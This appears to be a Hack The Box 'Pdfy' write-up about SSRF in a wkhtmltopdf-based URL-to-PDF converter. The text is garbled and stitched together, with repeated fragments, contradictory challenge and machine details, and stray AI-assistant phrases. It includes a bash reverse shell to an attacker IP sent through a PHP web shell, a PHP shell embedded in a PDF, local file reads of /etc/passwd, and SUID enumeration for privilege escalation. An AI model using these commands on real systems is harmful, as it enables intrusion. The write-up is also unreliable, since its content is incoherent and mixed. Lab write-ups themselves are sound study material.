Mastering the Pdfy Hack The Box Machine: A Detailed Writeup (Upd. 2026)
I crafted a malicious PDF using tools like pdftk to embed a PHP shell within it. Once uploaded, the server would attempt to convert the PDF, executing my malicious payload in the process. However, I encountered some difficulties here due to restrictions on the upload process.
fetch("/api/cache", method: "POST", body: JSON.stringify( url: url.value ), headers: "Content-Type": "application/json" , ) Use code with caution.
We need to set up our own attacker server. Here, we'll use a simple HTTP server (like Python's http.server ) and expose it to the internet using ngrok to bypass potential firewall issues. pdfy htb writeup upd
I can provide more information on how to defend against these vulnerabilities if you specify your needs:
The challenge presents a web application designed to take a user-supplied URL and convert that web page into a downloadable PDF document. By understanding how the backend PDF rendering engine processes redirects, you can bypass local restrictions to read sensitive system files and capture the flag.
The scan reveals the following open ports: Mastering the Pdfy Hack The Box Machine: A
We start with an Nmap scan to identify open ports and services. nmap -sC -sV -oA nmap/pdfy 10.10.10.x Use code with caution. Port 22/tcp (SSH): Likely for final access. Port 80/tcp (HTTP): The primary web application. Web Application Analysis (Port 80)
Read local files (like /etc/passwd ) using the server's internal access. Step-by-Step Walkthrough Reconnaissance & Identification The web interface accepts a URL to convert to PDF. The backend often uses wkhtmltopdf to render the content.
To read local files, you need to bypass the URL input filter. The easiest way to achieve this is by using a hosted on your own machine. Instead of giving the application a direct file path, you give it a URL pointing to a script you control. However, I encountered some difficulties here due to
: Server-Side Request Forgery (SSRF) triggered via PDF generation. 1. Initial Reconnaissance
This method uses a simple HTML page hosted on your own machine to redirect wkhtmltopdf to the target local file.
This writeup covers the challenge from Hack The Box , updated as of April 2026. This challenge focuses on exploiting Server-Side Request Forgery (SSRF) via a PDF generation service that uses a vulnerable version of wkhtmltopdf . Challenge Overview
Search linux version
Trigger a reverse shell: http://10.10.10.x/shell.php?cmd=bash -c 'bash -i >& /dev/tcp/10.10.x.x/4444 0>&1' We are now on the box as the www-data user. 5. Privilege Escalation: Root Access With low-level access, we need to escalate to root. Enumerating Local Privileges We check for SUID binaries, sudo rights, or cron jobs. sudo -l find / -perm -u=s -type f 2>/dev/null Use code with caution. Exploit: System Service/Cron Job